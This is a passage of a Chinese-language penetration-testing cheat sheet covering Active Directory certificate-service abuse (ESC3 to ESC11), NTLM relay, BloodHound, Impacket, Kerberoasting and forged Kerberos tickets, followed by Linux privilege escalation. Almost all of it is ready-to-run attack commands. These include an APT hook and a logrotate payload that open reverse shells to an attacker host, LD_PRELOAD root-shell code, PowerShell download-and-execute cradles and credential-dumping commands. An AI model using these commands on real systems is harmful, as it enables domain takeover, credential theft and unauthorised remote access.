certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE>
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template User -on-behalf-of '<DOMAIN>\Administrator' -pfx <USERNAME>.pfx
certipy auth -pfx administrator.pfx -dc-ip <RHOST>
ESC3:注册代理模板
1
2
3
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE>
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template User -on-behalf-of '<DOMAIN>\Administrator' -pfx <USERNAME>.pfx
certipy auth -pfx administrator.pfx -dc-ip <RHOST>
ESC4:存在漏洞的证书模板访问控制
1
2
3
certipy template -username <USERNAME>@<DOMAIN> -password <PASSWORD> -template <TEMPLAET> -save-old
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE> -upn administrator@<DOMAIN>
certipy auth -pfx administrator.pfx -dc-ip <RHOST>
ESC6:EDITF_ATTRIBUTESUBJECTALTNAME2
1
2
3
4
certipy find -username <USERNAME>@<DOMAIN> -password <PASSWORD> -vulnerable -dc-ip <RHOST> -stdout
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template User -upn administrator@<DOMAIN>
certipy req -ca '<CA>' -username administrator@<DOMAIN> -password <PASSWORD> -target <CA> -template User -upn administrator@<DOMAIN>
certipy auth -pfx administrator.pfx -dc-ip <RHOST>
ESC7:脆弱的证书颁发机构访问控制
1
2
3
4
5
6
certipy ca -ca '<CA>' -add-officer <USERNAME> -username <USERNAME>@<DOMAIN> -password <PASSWORD>
certipy ca -ca '<CA>' -enable-template SubCA -username <USERNAME>@<DOMAIN> -password <PASSWORD>
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template SubCA -upn administrator@<DOMAIN>
certipy ca -ca '<CA>' -issue-request <ID> -username <USERNAME>@<DOMAIN> -password <PASSWORD>
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -retrieve <ID>
certipy auth -pfx administrator.pfx -dc-ip <RHOST>
ESC8:NTLM 中继到 AD CS HTTP 端点
1
2
3
4
5
6
certipy relay -target 'http://<CA>'
certipy relay -ca '<CA>' -template <TEMPLATE>
python3 PetitPotam.py <RHOST> <DOMAIN>
certipy auth -pfx dc.pfx -dc-ip <RHOST>
export KRB5CCNAME=dc.ccache
impacket-secretsdump -k -no-pass <DOMAIN>/'dc$'@<DOMAIN>
中继攻击过程
1
2
3
4
5
impacket-ntlmrelayx -t http://<RHOST>/certsrv/certfnsh.asp -smb2support --adcs --template <TEMPLATE>
python3 PetitPotam.py <RHOST> <DOMAIN>
python3 gettgtpkinit.py -pfx-base64 $(cat base64.b64) '<DOMAIN>'/'dc$' 'dc.ccache'
export KRB5CCNAME=dc.ccache
impacket-secretsdump -k -no-pass <DOMAIN>/'dc$'@<DOMAIN>
ESC9:无安全扩展
1
2
3
4
5
certipy shadow auto -username <USERNAME>@<DOMAIN> -password <PASSWORD> -account <USERNAME>
certipy account update -username <USERNAME>@<DOMAIN> -password <PASSWORD> -user <USERNAME> -upn Administrator
certipy req -ca '<CA>' -username <USERNAME> -hashes 54296a48cd30259cc88095373cec24da -template <TEMPLATE>
certipy account update -username <USERNAME>@<DOMAIN> -password <PASSWORD> -user <USERNAME> -upn <USERNAME>@<DOMAIN>
certipy auth -pfx administrator.pfx -domain <DOMAIN>
ESC10:弱证书映射
情况1
1
2
3
4
5
certipy shadow auto -username <USERNAME>@<DOMAIN> -password <PASSWORD> -account <USERNAME>
certipy account update -username <USERNAME>@<DOMAIN> -password <PASSWORD> -user <USERNAME> -upn Administrator
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -hashes a87f3a337d73085c45f9416be5787d86
certipy account update -username <USERNAME>@<DOMAIN> -password <PASSWORD> -user <USERNAME -upn <USERNAME>@<DOMAIN>
certipy auth -pfx administrator.pfx -domain <DOMAIN>
案例2
1
2
3
4
5
certipy shadow auto -username <USERNAME>@<DOMAIN> -password <PASSWORD> -account <USERNAME>
certipy account update -username <USERNAME>@<DOMAIN> -password <PASSWORD> -user <USERNAME> -upn 'DC$@<DOMAIN>'
certipy req -ca 'CA' -username <USERNAME>@<DOMAIN> -password -hashes a87f3a337d73085c45f9416be5787d86
certipy account update -username <USERNAME>@<DOMAIN> -password <PASSWORD> -user <USERNAME -upn <USERNAME>@<DOMAIN>
certipy auth -pfx dc.pfx -dc-ip <RHOST> -ldap-shell
ESC11:IF_ENFORCEENCRYPTICERTREQUEST
1
2
certipy relay -target 'rpc://<CA>' -ca 'CA'
certipy auth -pfx administrator.pfx -domain <DOMAIN>

ADCS模板

1
2
Import-Module .\ADCSTemplate.psm1
New-ADCSTemplate -DisplayName TopCA -JSON (Export-ADCSTemplate -DisplayName 'Subordinate Certification Authority') -AutoEnroll -Publish -Identity '<DOMAIN>\Domain Users'

管理员管理器

1
AD-miner -u <USERNAME> -p <PASSWORD> -cf <NAME>

寻血猎犬 - bloodhound

1
2
3
4
sudo apt-get install openjdk-11-jdk
pip install bloodhound
sudo apt-get install neo4j
sudo apt-get install bloodhound
安装并启动数据库
1
2
3
4
5
6
7
wget -O - https://debian.neo4j.com/neotechnology.gpg.key | sudo apt-key add -
sudo echo 'deb https://debian.neo4j.com stable 4.0' > /etc/apt/sources.list.d/neo4j.list
sudo apt-get update
sudo apt-get install apt-transport-https
sudo apt-get install neo4j
systemctl start neo4j
./bloodhound --no-sandbox

http://localhost:7474/浏览器/

Docker容器
1
docker run -itd -p 7687:7687 -p 7474:7474 --env NEO4J_AUTH=neo4j/<PASSWORD> -v $(pwd)/neo4j:/data neo4j:4.4-community
数据库密码重置

http://localhost:7474/浏览器/

1
ALTER USER neo4j SET PASSWORD '<PASSWORD>'

寻血猎犬蟒蛇 - bloodhound-python

1
2
3
4
bloodhound-python -u '<USERNAME>' -p '<PASSWORD>' -d '<DOMAIN>' -gc '<DOMAIN>'-ns <RHOST> -c all --zip
bloodhound-python -u '<USERNAME>' -p '<PASSWORD>' -d '<DOMAIN>' -dc '<RHOST>' -ns <RHOST> -c all --zip
bloodhound-python -u '<USERNAME>' -p '<PASSWORD>' -d '<DOMAIN>' -ns <RHOST> --dns-tcp -no-pass -c ALL --zip
bloodhound-python -u '<USERNAME>' -p '<PASSWORD>' -d '<DOMAIN>' -dc '<RHOST>' -ns <RHOST> --dns-tcp -no-pass -c ALL --zip

bloodyAD 工具

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> get object Users --attr member                                        // 获取组成员
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> get object 'DC=<DOMAIN>,DC=local' --attr minPwdLength                 // 获取最小密码长度策略
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> get object 'DC=<DOMAIN>,DC=local' --attr msDS-Behavior-Version        // Get AD functional level
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> get children 'DC=<DOMAIN>,DC=local' --type user                       // Get all users of the domain
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> get children 'DC=<DOMAIN>,DC=local' --type computer                   // Get all computers of the domain
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> get children 'DC=<DOMAIN>,DC=local' --type container                  // Get all containers of the domain
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> add uac <USERNAME> DONT_REQ_PREAUTH                                   // Enable DONT_REQ_PREAUTH for ASREPRoast
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> remove uac <USERNAME> ACCOUNTDISABLE                                  // Disable ACCOUNTDISABLE
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> get object <USERNAME> --attr userAccountControl                       // Get UserAccountControl flags
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> get object '<OBJECT>$' --attr msDS-ManagedPassword                    // Read GMSA account password
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> get object '<OBJECT>$' --attr ms-Mcs-AdmPwd                           // Read LAPS password
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> get object 'DC=<DOMAIN>,DC=local' --attr ms-DS-MachineAccountQuota    // Read quota for adding computer objects to domain
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> add dnsRecord <RECORD> <LHOST>                                        // Add a new DNS entry
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> remove dnsRecord <RECORD> <LHOST>                                     // Remove a DNS entry
bloodyAD -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --host <RHOST> get dnsDump                                                           // Get AD DNS records

Certify

https://github.com/GhostPack/Certify

1
2
.\Certify find /vulnerable
.\Certify.exe find /vulnerable /currentuser

certipy 工具

参考地址: https://github.com/ly4k/Certipy
参考地址: https://github.com/ly4k/BloodHound/

1
2
certipy find -dc-ip <RHOST> -u <USERNAME>@<DOMAIN> -p <PASSWORD>
certipy find -dc-ip <RHOST> -u <USERNAME> -p <PASSWORD> -vulnerable -stdout
创建账户
1
certipy account create -username <USERNAME>@<DOMAIN> -password <PASSWORD> -dc-ip <RHOST> -dns <DOMAIN_CONTROLLER_DNS_NAME> -user <COMPUTERNAME>
验证
1
certipy auth -pfx <FILE>.pfx -dc-ip <RHOST> -u <USERNAME> -domain <DOMAIN>
LDAP-Shell
1
certipy auth -pfx <FILE>.pfx -dc-ip <RHOST> -u <USERNAME> -domain <DOMAIN> -ldap-shell
1
2
# add_user <USERNAME>
# add_user_to_group <GROUP>
证书伪造
1
certipy template -username <USERNAME>@<DOMAIN> -password <PASSWORD> -template Web -dc-ip <RHOST> -save-old
证书申请

由于当前存在问题,请运行以下命令两次certipy

1
certipy req -username <USERNAME>@<DOMAIN> -password <PASSWORD> -ca <CA> -target <FQDN> -template <TEMPLATE> -dc-ip <RHOST>
1
2
certipy req -username <USERNAME>@<DOMAIN> -password <PASSWORD> -ca <CA> -target <FQDN> -template <TEMPLATE> -dc-ip <RHOST> -upn <USERNAME>@<DOMAIN> -dns <FQDN>
certipy req -username <USERNAME>@<DOMAIN> -password <PASSWORD> -ca <CA> -target <FQDN> -template <TEMPLATE> -dc-ip <RHOST> -upn <USERNAME>@<DOMAIN> -dns <FQDN> -debug
恢复更改
1
certipy template -username <USERNAME>@<DOMAIN> -password <PASSWORD> -template <TEMPLATE> -dc-ip <RHOST> -configuration <TEMPLATE>.json
启动 BloodHound 叉子
1
./BloodHound --disable-gpu-sandbox

enum4linux-ng

1
enum4linux-ng -A <RHOST>

Evil-WinRM

1
2
evil-winrm -i <RHOST> -u <USERNAME> -p <PASSWORD>
evil-winrm -i <RHOST> -c /PATH/TO/CERTIFICATE/<CERTIFICATE>.crt -k /PATH/TO/PRIVATE/KEY/<KEY>.key -p -u -S

Impakcet 工具包

1
2
3
4
5
6
7
8
9
10
11
impacket-atexec -k -no-pass <DOMAIN>/Administrator@<DOMAIN_CONTROLLER>.<DOMAIN> 'type C:\PATH\TO\FILE\<FILE>'
impacket-GetADUsers -all -dc-ip <RHOST> <DOMAIN>/
impacket-getST <DOMAIN>/<USERNAME>$ -spn WWW/<DOMAIN_CONTROLLER>.<DOMAIN> -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator
impacket-lookupsid <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
impacket-netview <DOMAIN>/<USERNAME> -targets /PATH/TO/FILE/<FILE>.txt -users /PATH/TO/FILE/<FILE>.txt
impacket-reg <DOMAIN>/<USERNAME>:<PASSWORD:PASSWORD_HASH>@<RHOST> <ACTION> <ACTION>
impacket-rpcdump <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
impacket-samrdump <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
impacket-services <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST> <ACTION>
impacket-smbpasswd <RHOST>/<USERNAME>:'<PASSWORD>'@<RHOST> -newpass '<PASSWORD>'
impacket-smbserver local . -smb2support
IMPACKET-SMBCLIENT
1
impacket-smbclient <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
1
2
export KRB5CCNAME=<USERNAME>.ccache
impacket-smbclient -k <DOMAIN>/<USERNAME>@<RHOST>.<DOMAIN> -no-pass
IMPACKET-GETST
1
2
impacket-getST <DOMAIN>/<USERNAME> -spn <USERNAME>/<RHOST> -hashes :<HASH> -impersonate <USERNAME>
impacket-getST <DOMAIN>/<USERNAME>$ -spn <USERNAME>/<RHOST> -hashes :<HASH> -impersonate <USERNAME>
IMPACKET-GETTGT
1
2
impacket-getTGT <RHOST>/<USERNAME>:<PASSWORD>
impacket-getTGT <RHOST>/<USERNAME> -dc-ip <RHOST> -hashes aad3b435b51404eeaad3b435b51404ee:7c662956a4a0486a80fbb2403c5a9c2c
IMPACKET-GETNPUSERS
1
2
3
impacket-GetNPUsers <DOMAIN>/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
impacket-GetNPUsers <DOMAIN>/ -usersfile usernames.txt -format john -outputfile hashes
impacket-GetNPUsers <DOMAIN>/<USERNAME> -request -no-pass -dc-ip <RHOST>
IMPACKET-GETUSERSPNS
1
impacket-GetUserSPNs -request -dc-ip <RHOST> <DOMAIN>/<USERNAME>
1
2
export KRB5CCNAME=<USERNAME>.ccache
impacket-GetUserSPNs <DOMAIN>/<USERNAME>:<PASSWORD> -k -dc-ip <RHOST>.<DOMAIN> -no-pass -request
IMPACKET-SECRETSDUMP
1
2
3
4
impacket-secretsdump <DOMAIN>/<USERNAME>@<RHOST>
impacket-secretsdump -dc-ip <RHOST> <DOMAIN>/<SUERNAME>:<PASSWORD>@<RHOST>
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
impacket-secretsdump -ntds ndts.dit -system system -hashes lmhash:nthash LOCAL -output nt-hash
1
2
export KRB5CCNAME=<USERNAME>.ccache
impacket-secretsdump -k <DOMAIN>/<USERNAME>@<RHOST>.<DOMAIN> -no-pass -debug
IMPACKET-LOOKUPSID
1
impacket-lookupsid <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
IMPACKET-NETVIEW
1
impacket-netview <DOMAIN>/<USERNAME> -targets /PATH/TO/FILE/<FILE>.txt -users /PATH/TO/FILE/<FILE>.txt
IMPACKET-NTLMRELAYX
Common Commands
1
impacket-ntlmrelayx -t ldap://<RHOST> --no-wcf-server --escalate-user <USERNAME>
Example
1
impacket-ntlmrelayx --no-http-server -smb2support -t <RHOST> -c "powershell -enc JABjAGwAaQBlAG4AdA<--- CUT FOR BREVITY --->"
1
dir \\<LHOST>\foobar
1
nc -lnvp <LPORT>
IMPACKET-PSEXEC
1
2
impacket-psexec <USERNAME>@<RHOST>
impacket-psexec <RHOST>/administrator@<RHOST> -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18
IMPACKET-REG
1
impacket-reg <DOMAIN>/<USERNAME>:<PASSWORD:PASSWORD_HASH>@<RHOST> <COMMAND> <COMMAND>
IMPACKET-RPCDUMP
1
impacket-rpcdump <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
IMPACKET-SAMRDUMP
1
impacket-samrdump <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
IMPACKET-SERVICES
1
impacket-services <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST> <COMMAND>
IMPACKET-SMBPASSWD
1
impacket-smbpasswd <RHOST>/<USERNAME>:'<PASSWORD>'@<RHOST> -newpass '<PASSWORD>'
IMPACKET-SMBSERVER
1
impacket-smbserver local . -smb2support
IMPACKET-TICKETER
要求
  • 有效用户
  • NTHASH
  • 域SID
1
2
export KRB5CCNAME=<USERNAME>.ccache
impacket-ticketer -nthash C1929E1263DDFF6A2BCC6E053E705F78 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain <RHOST> -spn MSSQLSVC/<RHOST>.<RHOST> -user-id 500 Administrator
修复 [-] 异常必须从 BaseException 派生
问题
1
2
3
4
impacket-GetUserSPNs <RHOST>/<USERNAME>:<PASSWORD> -k -dc-ip <DOMAIN_CONTROLLER>.<RHOST> -no-pass -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] exceptions must derive from BaseException
如何修复它
1
2
3
241         if self.__doKerberos:
242             #target = self.getMachineName()
243             target = self.__kdcHost
dacledit.py

https://github.com/fortra/impacket/blob/204c5b6b73f4d44bce0243a8f345f00e308c9c20/examples/dacledit.py

1
python3 dacledit.py <DOMAIN>/<USERNAME>:<PASSWORD> -k -target-dn 'DC=<DOMAIN>,DC=<DOMAIN>' -dc-ip <RHOST> -action read -principal '<USERNAME>' -target '<GROUP>' -debug
修复 msada_guids 错误
1
2
#from impacket.msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS
from msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS

然后将其msada_guids.py放入同一目录dacledit.py

https://github.com/Porchetta-Industries/CrackMapExec/blob/master/cme/helpers/msada_guids.py

owneredit.py

https://github.com/fortra/impacket/blob/5c477e71a60e3cc434ebc0fcc374d6d108f58f41/examples/owneredit.py

1
python3 owneredit.py -k '<DOMAIN>/<USERNAME>:<PASSWORD>' -dc-ip <RHOST> -action write -new-owner '<USERNAME>' -target '<GROUP>' -debug

JAWS

1
IEX(New-Object Net.webclient).downloadString('http://<LHOST>:<LPORT>/jaws-enum.ps1')

Kerberos

https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a

一般注意事项
  • 金票是票证授予票证(TGT),完全离线伪造(需要 KRBTGT 帐户哈希)。
  • Silver Ticket 是伪造的服务身份验证票证(需要服务主体名称 (SPN) 和机器帐户密钥(RC4 或 AES 中的哈希值))。银票不接触域控制器 (DC)。
  • 钻石票本质上是黄金票,但由域控制器 (DC) 请求。
暴力破解
1
./kerbrute -domain <DOMAIN> -users <FILE> -passwords <FILE> -outputfile <FILE>
与用户列表
1
.\Rubeus.exe brute /users:<FILE> /passwords:<FILE> /domain:<DOMAIN> /outfile:<FILE>
检查域中所有用户的密码
1
.\Rubeus.exe brute /passwords:<FILE> /outfile:<FILE>
ASPREPROAST
检查所有域用户的 ASPREPRoast(需要凭据)
1
2
impacket-GetNPUsers <DOMAIN>/<USERNAME>:<PASSWORD> -request -format hashcat -outputfile <FILE>
impacket-GetNPUsers <DOMAIN>/<USERNAME>:<PASSWORD> -request -format john -outputfile <FILE>
检查 ASPREPRoast 中的用户列表(无需凭据)
1
2
impacket-GetNPUsers <DOMAIN>/ -usersfile <FILE> -format hashcat -outputfile <FILE>
impacket-GetNPUsers <DOMAIN>/ -usersfile <FILE> -format john -outputfile <FILE>
检查域中所有域用户的 ASREPROAST
1
.\Rubeus.exe asreproast  /format:hashcat /outfile:<FILE>
KERBEROROASTING
1
2
3
4
5
impacket-GetUserSPNs <DOMAIN>/<USERNAME>:<PASSWORD> -outputfile <FILE>
.\Rubeus.exe kerberoast /outfile:<FILE>
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII <FILE>
Invoke-Kerberoast -OutputFormat john | % { $_.Hash } | Out-File -Encoding ASCII <FILE>
跳过哈希/传递密钥 (PTK)
请求带有哈希值的 TGT
1
impacket-getTGT <DOMAIN>/<USERNAME> -hashes <LMHASH>:<NTLMHASH>
使用 aesKey 请求 TGT(更安全的加密,可能更隐蔽,因为默认使用它)
1
impacket-getTGT <DOMAIN>/<USERNAME> -aesKey <KEY>
使用密码请求 TGT
1
impacket-getTGT <DOMAIN>/<USERNAME>:<PASSWORD>
设置 Impacket 使用的 TGT
1
export KRB5CCNAME=<USERNAME>.ccache
执行远程命令
1
2
3
impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
询问并注入票据
1
.\Rubeus.exe asktgt /domain:<DOMAIN> /user:<USERNAME> /rc4:<NTLMHASH> /ptt
在远程主机上执行 CMD
1
.\PsExec.exe -accepteula \\<RHOST> cmd
票据传递攻击 (PTT)
Linux 上的收获票
检查门票的类型和位置
1
grep default_ccache_name /etc/krb5.conf
  • 如果没有返回,则默认为 FILE:/tmp/krb5cc_%{uid}
  • 如果是文件票证,可以复制粘贴它们来使用它们
  • 如果是KEYRING门票,可以使用工具门票获取
  • 要转储用户票证,如果是 root,建议通过注入其他用户进程来转储它们
  • 要注入,必须将票证复制到所有用户可访问的文件夹中
1
2
cp tickey /tmp/tickey
/tmp/tickey -i
来自 Windows 的收获门票
1
2
sekurlsa::tickets /export
.\Rubeus dump
将 Rubeus 转储的 Ticket 转换为 base64
1
[IO.File]::WriteAllBytes("<TICKET>.kirbi", [Convert]::FromBase64String("<TICKET>"))
使用 Ticket_converter.py 在 Linux 和 Windows 格式之间转换票据

https://github.com/Zer1t0/ticket_converter

1
2
python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi
在 Linux 上使用票证
1
export KRB5CCNAME=<USERNAME>.ccache
使用 TGT 执行远程命令
1
2
3
impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
在 Windows 上使用票证
使用 mimikatz 注入 Ticket
1
kerberos::ptt <KIRBI_FILE>
用 Rubeus 注入票据
1
.\Rubeus.exe ptt /ticket:<KIRBI_FILE>
在远程主机上执行 CMD
1
.\PsExec.exe -accepteula \\<RHOST> cmd
白银票据
导入示例
使用 NTLM 生成 TGS
1
python ticketer.py -nthash <NTLMHASH> -domain-sid <SID> -domain <DOMAIN> -spn <SPN>  <USERNAME>
使用 aesKey 生成 TGS
1
python ticketer.py -aesKey <KEY> -domain-sid <SID> -domain <DOMAIN> -spn <SPN>  <USERNAME>
导入到本地票据凭证
1
export KRB5CCNAME=<USERNAME>.ccache
使用 TGT 执行远程命令
1
2
3
impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
示例
使用 NTLM 生成 TGS
1
kerberos::golden /domain:<DOMAIN>/sid:<SID> /rc4:<NTLMHASH> /user:<USERNAME> /service:<SERVICE> /target:<RHOST>
使用 AES 128 位密钥生成 TGS
1
kerberos::golden /domain:<DOMAIN>/sid:<SID> /aes128:<KEY> /user:<USERNAME> /service:<SERVICE> /target:<RHOST>
使用 AES 256 位密钥生成 TGS(更安全的加密,可能更隐蔽,因为默认使用它)
1
kerberos::golden /domain:<DOMAIN>/sid:<SID> /aes256:<KEY> /user:<USERNAME> /service:<SERVICE> /target:<RHOST>
使用 Mimikatz 注入 TGS
1
kerberos::ptt <KIRBI_FILE>
Rubeus 的例子
1
.\Rubeus.exe ptt /ticket:<KIRBI_FILE>
在远程主机上执行CMD
1
.\PsExec.exe -accepteula \\<RHOST> cmd
黄金票据
导入示例
使用 NTLM 生成 TGT
1
python ticketer.py -nthash <KRBTGT_NTLM_HASH> -domain-sid <SID> -domain <DOMAIN>  <USERNAME>
使用 aesKey 生成 TGT
1
python ticketer.py -aesKey <KEY> -domain-sid <SID> -domain <DOMAIN>  <USERNAME>
设置 Impacket 使用的 TGT
1
export KRB5CCNAME=<USERNAME>.ccache
使用 TGT 执行远程命令
1
2
3
impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
示例
使用 NTLM 生成 TGT
1
kerberos::golden /domain:<DOMAIN>/sid:<SID> /rc4:<KRBTGT_NTLM_HASH> /user:<USERNAME>
使用 AES 128 位密钥生成 TGT
1
kerberos::golden /domain:<DOMAIN>/sid:<SID> /aes128:<KEY> /user:<USERNAME>
使用 AES 256 位密钥生成 TGT(更安全的加密,可能更隐蔽,因为默认使用它)
1
kerberos::golden /domain:<DOMAIN>/sid:<SID> /aes256:<KEY> /user:<USERNAME>
使用 Mimikatz 注入 TGT
1
kerberos::ptt <KIRBI_FILE>
Rubeus的例子
用 Rubeus 注入票据
1
.\Rubeus.exe ptt /ticket:<KIRBI_FILE>
在远程主机上执行CMD
1
.\PsExec.exe -accepteula \\<RHOST> cmd
从密码获取NTLM
1
python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "<PASSWORD>".encode("utf-16le")).digest())'

LDAPsearch

1
2
3
4
5
ldapsearch -H ldap://<RHOST> -x -s base -b '' "(objectClass=*)" "*" +
ldapsearch -H ldaps://<RHOST>:636/ -x -s base -b '' "(objectClass=*)" "*" +
ldapsearch -x -H ldap://<RHOST> -D '' -w '' -b "DC=<RHOST>,DC=local"
ldapsearch -x -H ldap://<RHOST> -D '' -w '' -b "DC=<RHOST>,DC=local" | grep descr -A 3 -B 3
ldapsearch -H ldap://<RHOST> -D <USERNAME> -w "<PASSWORD>" -b "CN=Users,DC=<RHOST>,DC=local" | grep info

Linux

基本 Linux 枚举
1
2
3
4
5
6
7
8
9
10
11
12
13
id
sudo -l
uname -a
env
cat /etc/hosts
cat /etc/fstab
cat /etc/passwd
ss -tulpn
ps -auxf
ls -lahv
ls -R /home
ls -la /opt
capsh --print
查找命令
1
2
3
4
5
6
7
8
9
find / -user <USERNAME> -ls 2>/dev/null
find / -user <USERNAME> -ls 2>/dev/null | grep -v proc 2>/dev/null
find / -group <GROUP> 2>/dev/null
find / -perm -4000 2>/dev/null | xargs ls -la
find / -type f -user root -perm -4000 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
find / -cmin -60    // 查找在过去60分钟内更改的文件
find / -amin -60    // 查找过去60分钟内的文件访问
find ./ -type f -exec grep --color=always -i -I 'password' {} \;    // search for passwords
grep 获取密码
1
2
3
4
grep -R db_passwd
grep -roiE "password.{20}"
grep -oiE "password.{20}" /etc/*.conf
grep -v "^[#;]" /PATH/TO/FILE | grep -v "^$"    // grep for passwords like "DBPassword:"
APACHE2
使用 apache2 二进制读取文件的第一行
1
sudo /usr/sbin/apache2 -f <FILE>
APT
1
echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f"};' > /etc/apt/apt.conf.d/<FILE>
ARIA2C
1
aria2c -d /root/.ssh/ -o authorized_keys "http://<LHOST>/authorized_keys" --allow-overwrite=true
Bash 调试模式
    • Bash <4.4
      1
      env -i SHELLOPTS=xtrace PS4='$(chmod +s /bin/bash)' /usr/local/bin/<BINARY>
bash 函数
    • Bash <4.2-048
      1
      2
      3
      function /usr/sbin/<BINARY> { /bin/bash -p; }
      export -f /usr/sbin/<BINARY>
      /usr/sbin/<BINARY>
LD_预加载

https://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/

shell.c
1
2
3
4
5
6
7
8
9
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setresuid(0,0,0);
    system("/bin/bash -p");
}

或者

1
2
3
4
5
6
7
8
9
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}
编译
1
gcc -o <SHARED_OBJECT>.so <FILE>.c -shared -FPIC -nostartfiles
权限提升
1
sudo LD_PRELOAD=/PATH/TO/SHARED_OBJECT/<SHARED_OBJECT>.so <BINARY>
LD_LIBRARY_PATH
获取有关Libraries的信息
1
ldd /PATH/TO/BINARY/<BINARY>
shell.c
1
2
3
4
5
6
7
8
9
10
#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
    unsetenv("LD_LIBRARY_PATH");
    setresuid(0,0,0);
    system("/bin/bash -p");
}
编译
1
gcc -o <LIBRARY>.so.<NUMBER> -shared -fPIC <FILE>.c
权限提升
1
sudo LD_LIBRARY_PATH=/PATH/TO/LIBRARY/<LIBRARY>.so.<NUMBER> <BINARY>
logrotten

https://github.com/whotwagner/logrotten

1
if [ `id -u` -eq 0 ]; then ( /bin/sh -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1 ); fi
如果在 logrotate.cfg 中设置了“create”选项
1
./logrotten -p ./payloadfile /tmp/log/pwnme.log
如果在 logrotate.cfg 中设置了“compress”选项
1
./logrotten -p ./payloadfile -c -s 4 /tmp/log/pwnme.log
路径变量劫持
1
2
3
find / -perm -u=s -type f 2>/dev/null
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
export PATH=$(pwd):$PATH
PHP7.2
1
